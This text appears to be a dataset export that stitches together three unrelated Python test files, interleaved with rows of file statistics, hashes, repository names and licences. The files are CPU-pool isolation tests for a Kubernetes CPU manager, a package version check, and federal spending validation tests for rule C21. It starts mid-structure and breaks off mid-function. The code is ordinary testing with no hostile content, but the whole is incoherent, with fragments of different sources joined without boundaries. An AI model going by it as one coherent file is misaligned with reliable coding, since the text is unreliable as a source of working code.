"0": {
"6,17,7,18,8,19": []
},
"1": {}
},
"exclusive-non-isolcpus": {
"0": {
"9,20": [],
"10,21": []
},
"1": {}
}
}
def return_config(conf):
c = FAKE_CONFIG
for item in conf:
c[item["pool"]][item["socket"]][item["cl"]] = item["tasks"]
return config.build_config(c)
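# Note (editorial addition): return_config overlays the "tasks" entries from the given
# pool descriptors onto FAKE_CONFIG before building the config object, so e.g.
# return_config(EXCL_ONE) marks cpu list "0,11" of the exclusive pool on socket "0" as
# busy with task "123"; that is why test_isolate_exclusive2 expects the next free list,
# [1, 12], to be picked. Because c aliases FAKE_CONFIG rather than copying it, these
# overlays also persist across calls within the test session.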
class MockConfig(config.Config):
def __init__(self, conf):
self.cm_name = "fake-name"
self.owner = "fake-owner"
self.c_data = conf
def lock(self):
return
def unlock(self):
return
class MockProcess():
def __init__(self):
self.pid = 9
self._cpu_affin = []  # default affinity; the getter/setter below read and write this attribute
def cpu_affinity(self, cpus=None):
if not cpus:
return self.get_cpu_affinity()
else:
self.set_cpu_affinity(cpus)
def get_cpu_affinity(self):
return self._cpu_affin
def set_cpu_affinity(self, new_affin):
self._cpu_affin = new_affin
class MockChild():
def __init__(self):
self.name = "child"
self.terminate = "term"
def wait(self):
return
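# Note (editorial addition): the classes above stand in for the external handles that
# isolate.isolate() touches -- MockConfig for intel.config.Config, MockProcess for
# psutil.Process and MockChild for the subprocess.Popen child. MockProcess.cpu_affinity()
# mirrors psutil's combined getter/setter: called with no argument it reads the affinity,
# called with a cpu list it stores it, which lets the tests read back what isolate() set.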
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
@patch('intel.k8s.delete_config_map',
MagicMock(return_value=''))
@patch('intel.config.Config.lock', MagicMock(return_value=''))
@patch('intel.config.Config.unlock', MagicMock(return_value=''))
def test_isolate_exclusive1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process', MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [0, 11]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive2():
p = MockProcess()
c = MockConfig(return_config(EXCL_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [1, 12]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive3():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id="1")
assert p.cpu_affinity() == [3, 14]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared2():
p = MockProcess()
c = MockConfig(return_config(SHAR_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra2():
p = MockProcess()
c = MockConfig(return_config(INF_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive_non_isolcpus2():
p = MockProcess()
c = MockConfig(return_config(EXNI_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive-non-isolcpus", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [10, 21]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_pool_not_exist():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(KeyError) as err:
isolate.isolate("fake-pool", False, "fake-cmd",
["fake-args"], socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested pool fake-pool does not exist"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=0))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_n_cpus_lt_one():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(ValueError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested numbers of cores "\
"must be positive integer"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=5))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_not_enough_cpus():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert err is not None
assert err.value.args[0] == "Not enough free cpu lists "\
"in pool exclusive"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared_failure1():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], socket_id="1")
assert err is not None
assert err.value.args[0] == "No cpu lists in pool shared"
| 32.722714
| 77
| 0.611016
| 1,343
| 11,093
| 4.886821
| 0.106478
| 0.166844
| 0.222459
| 0.04693
| 0.807558
| 0.807558
| 0.783483
| 0.770684
| 0.770684
| 0.769465
| 0
| 0.023248
| 0.22059
| 11,093
| 338
| 78
| 32.819527
| 0.735832
| 0
| 0
| 0.586572
| 0
| 0
| 0.21464
| 0.042099
| 0
| 0
| 0
| 0
| 0.056537
| 1
| 0.077739
| false
| 0
| 0.014134
| 0.014134
| 0.123675
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3fedd54f35b58ab8701773f5d93dc85a0cd0515
| 244
|
py
|
Python
|
tests/test_version.py
|
rpanderson/workflow-sandbox
|
f03ea46945decb683cb95afa6f835a83884dc05e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_version.py
|
rpanderson/workflow-sandbox
|
f03ea46945decb683cb95afa6f835a83884dc05e
|
[
"BSD-3-Clause"
] | 17
|
2020-05-07T00:59:33.000Z
|
2021-12-12T03:55:14.000Z
|
tests/test_version.py
|
rpanderson/workflow-sandbox
|
f03ea46945decb683cb95afa6f835a83884dc05e
|
[
"BSD-3-Clause"
] | 2
|
2020-06-23T03:09:44.000Z
|
2020-06-23T05:50:31.000Z
|
from pkg_resources import get_distribution
import workflow_sandbox
def test_version():
"""Check version against `pkg_resources` from `setuptools`."""
assert workflow_sandbox.__version__ == get_distribution('workflow_sandbox').version
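# Note (editorial addition): pkg_resources.get_distribution() reads the installed
# distribution metadata, so this check only passes when the package has actually been
# installed into the environment (for example via an editable install), not when the
# module is merely imported from the source tree.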
| 30.5
| 87
| 0.795082
| 28
| 244
| 6.5
| 0.535714
| 0.247253
| 0.241758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114754
| 244
| 7
| 88
| 34.857143
| 0.842593
| 0.229508
| 0
| 0
| 0
| 0
| 0.087912
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
581d733e97eb87fc055b25e43cad0b2b5625ac13
| 24,216
|
py
|
Python
|
tests/unit/dataactvalidator/test_c21_award_financial.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
tests/unit/dataactvalidator/test_c21_award_financial.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
tests/unit/dataactvalidator/test_c21_award_financial.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
from random import randint
from tests.unit.dataactcore.factories.staging import AwardFinancialFactory
from tests.unit.dataactcore.factories.staging import ObjectClassProgramActivityFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'c21_award_financial'
_TAS = 'c21_award_financial_tas'
af_dict = dict(
submission_id=randint(1000, 10000),
tas='some-tas',
program_activity_code='some-code',
ussgl480100_undelivered_or_fyb=randint(-10000, -1000),
ussgl480100_undelivered_or_cpe=randint(-10000, -1000),
ussgl483100_undelivered_or_cpe=randint(-10000, -1000),
ussgl488100_upward_adjustm_cpe=randint(-10000, -1000),
obligations_undelivered_or_fyb=randint(-10000, -1000),
obligations_undelivered_or_cpe=randint(-10000, -1000),
ussgl490100_delivered_orde_fyb=randint(-10000, -1000),
ussgl490100_delivered_orde_cpe=randint(-10000, -1000),
ussgl493100_delivered_orde_cpe=randint(-10000, -1000),
ussgl498100_upward_adjustm_cpe=randint(-10000, -1000),
obligations_delivered_orde_fyb=randint(-10000, -1000),
obligations_delivered_orde_cpe=randint(-10000, -1000),
ussgl480200_undelivered_or_fyb=randint(-10000, -1000),
ussgl480200_undelivered_or_cpe=randint(-10000, -1000),
ussgl483200_undelivered_or_cpe=randint(-10000, -1000),
ussgl488200_upward_adjustm_cpe=randint(-10000, -1000),
gross_outlays_undelivered_fyb=randint(-10000, -1000),
gross_outlays_undelivered_cpe=randint(-10000, -1000),
ussgl490200_delivered_orde_cpe=randint(-10000, -1000),
ussgl490800_authority_outl_fyb=randint(-10000, -1000),
ussgl490800_authority_outl_cpe=randint(-10000, -1000),
ussgl498200_upward_adjustm_cpe=randint(-10000, -1000),
gross_outlays_delivered_or_fyb=randint(-10000, -1000),
gross_outlays_delivered_or_cpe=randint(-10000, -1000),
gross_outlay_amount_by_awa_fyb=randint(-10000, -1000),
gross_outlay_amount_by_awa_cpe=randint(-10000, -1000),
obligations_incurred_byawa_cpe=randint(-10000, -1000),
ussgl487100_downward_adjus_cpe=randint(-10000, -1000),
ussgl497100_downward_adjus_cpe=randint(-10000, -1000),
ussgl487200_downward_adjus_cpe=randint(-10000, -1000),
ussgl497200_downward_adjus_cpe=randint(-10000, -1000),
deobligations_recov_by_awa_cpe=randint(-10000, -1000)
)
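# Note (editorial addition): each monetary element above is drawn independently from
# randint(-10000, -1000), so File C (award financial) rows built from af_dict are negative
# throughout. The factories in the tests below reuse these exact amounts: test_success sets
# every File B value to twice the af_dict value, so the two identical File C rows sum to the
# File B amount and the C21 rule is satisfied, while test_failure shifts every File B value
# by one relative to a single File C row, which the rule flags as one error.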
def test_column_headers(database):
expected_subset = {'row_number', 'tas', 'program_activity_code', 'ussgl480100_undelivered_or_fyb_sum_c',
'ussgl480100_undelivered_or_cpe_sum_c', 'ussgl483100_undelivered_or_cpe_sum_c',
'ussgl488100_upward_adjustm_cpe_sum_c', 'obligations_undelivered_or_fyb_sum_c',
'obligations_undelivered_or_cpe_sum_c', 'ussgl490100_delivered_orde_fyb_sum_c',
'ussgl490100_delivered_orde_cpe_sum_c', 'ussgl493100_delivered_orde_cpe_sum_c',
'ussgl498100_upward_adjustm_cpe_sum_c', 'obligations_delivered_orde_fyb_sum_c',
'obligations_delivered_orde_cpe_sum_c', 'ussgl480200_undelivered_or_fyb_sum_c',
'ussgl480200_undelivered_or_cpe_sum_c', 'ussgl483200_undelivered_or_cpe_sum_c',
'ussgl488200_upward_adjustm_cpe_sum_c', 'gross_outlays_undelivered_fyb_sum_c',
'gross_outlays_undelivered_cpe_sum_c', 'ussgl490200_delivered_orde_cpe_sum_c',
'ussgl490800_authority_outl_fyb_sum_c', 'ussgl490800_authority_outl_cpe_sum_c',
'ussgl498200_upward_adjustm_cpe_sum_c', 'gross_outlays_delivered_or_fyb_sum_c',
'gross_outlays_delivered_or_cpe_sum_c', 'gross_outlay_amount_by_awa_fyb_sum_c',
'gross_outlay_amount_by_awa_cpe_sum_c', 'obligations_incurred_byawa_cpe_sum_c',
'ussgl487100_downward_adjus_cpe_sum_c', 'ussgl497100_downward_adjus_cpe_sum_c',
'ussgl487200_downward_adjus_cpe_sum_c', 'ussgl497200_downward_adjus_cpe_sum_c',
'deobligations_recov_by_awa_cpe_sum_c', 'ussgl480100_undelivered_or_fyb_sum_b',
'ussgl480100_undelivered_or_cpe_sum_b', 'ussgl483100_undelivered_or_cpe_sum_b',
'ussgl488100_upward_adjustm_cpe_sum_b', 'obligations_undelivered_or_fyb_sum_b',
'obligations_undelivered_or_cpe_sum_b', 'ussgl490100_delivered_orde_fyb_sum_b',
'ussgl490100_delivered_orde_cpe_sum_b', 'ussgl493100_delivered_orde_cpe_sum_b',
'ussgl498100_upward_adjustm_cpe_sum_b', 'obligations_delivered_orde_fyb_sum_b',
'obligations_delivered_orde_cpe_sum_b', 'ussgl480200_undelivered_or_fyb_sum_b',
'ussgl480200_undelivered_or_cpe_sum_b', 'ussgl483200_undelivered_or_cpe_sum_b',
'ussgl488200_upward_adjustm_cpe_sum_b', 'gross_outlays_undelivered_fyb_sum_b',
'gross_outlays_undelivered_cpe_sum_b', 'ussgl490200_delivered_orde_cpe_sum_b',
'ussgl490800_authority_outl_fyb_sum_b', 'ussgl490800_authority_outl_cpe_sum_b',
'ussgl498200_upward_adjustm_cpe_sum_b', 'gross_outlays_delivered_or_fyb_sum_b',
'gross_outlays_delivered_or_cpe_sum_b', 'gross_outlay_amount_by_pro_fyb_sum_b',
'gross_outlay_amount_by_pro_cpe_sum_b', 'obligations_incurred_by_pr_cpe_sum_b',
'ussgl487100_downward_adjus_cpe_sum_b', 'ussgl497100_downward_adjus_cpe_sum_b',
'ussgl487200_downward_adjus_cpe_sum_b', 'ussgl497200_downward_adjus_cpe_sum_b',
'deobligations_recov_by_pro_cpe_sum_b'}
actual = set(query_columns(_FILE, database))
assert (actual & expected_subset) == expected_subset
def test_success(database):
""" Tests that the sum of financial elements in File C is less than or equal
to the corresponding element in File B for the same TAS and Program Activity Code combination"""
af1 = AwardFinancialFactory(**af_dict)
af2 = AwardFinancialFactory(**af_dict)
op1 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] * 2,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] * 2,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] * 2,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] * 2,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] * 2,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] * 2,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] * 2,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] * 2,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] * 2,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] * 2,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] * 2,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] * 2,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] * 2,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] * 2,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] * 2,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] * 2,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] * 2,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] * 2,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] * 2,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] * 2,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] * 2,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] * 2,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] * 2,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] * 2,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] * 2,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] * 2,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] * 2,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] * 2,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] * 2,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] * 2,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] * 2,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] * 2,
tas=af_dict['tas'],
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op2 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] * 2,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] * 2,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] * 2,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] * 2,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] * 2,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] * 2,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] * 2,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] * 2,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] * 2,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] * 2,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] * 2,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] * 2,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] * 2,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] * 2,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] * 2,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] * 2,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] * 2,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] * 2,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] * 2,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] * 2,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] * 2,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] * 2,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] * 2,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] * 2,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] * 2,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] * 2,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] * 2,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] * 2,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] * 2,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] * 2,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] * 2,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] * 2,
tas='some-other-tas',
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op3 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] * 2,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] * 2,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] * 2,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] * 2,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] * 2,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] * 2,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] * 2,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] * 2,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] * 2,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] * 2,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] * 2,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] * 2,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] * 2,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] * 2,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] * 2,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] * 2,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] * 2,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] * 2,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] * 2,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] * 2,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] * 2,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] * 2,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] * 2,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] * 2,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] * 2,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] * 2,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] * 2,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] * 2,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] * 2,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] * 2,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] * 2,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] * 2,
tas=af_dict['tas'],
program_activity_code='some-other-code',
submission_id=af_dict['submission_id']
)
errors = number_of_errors(_FILE, database, models=[af1, af2, op1, op2, op3])
assert errors == 0
def test_failure(database):
""" Tests that the sum of financial elements in File C is not less than or equal
to the corresponding element in File B for the same TAS and Program Activity Code combination"""
af1 = AwardFinancialFactory(**af_dict)
op1 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] + 1,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] + 1,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] + 1,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] + 1,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] + 1,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] + 1,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] + 1,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] + 1,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] + 1,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] + 1,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] + 1,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] + 1,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] + 1,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] + 1,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] + 1,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] + 1,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] + 1,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] + 1,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] + 1,
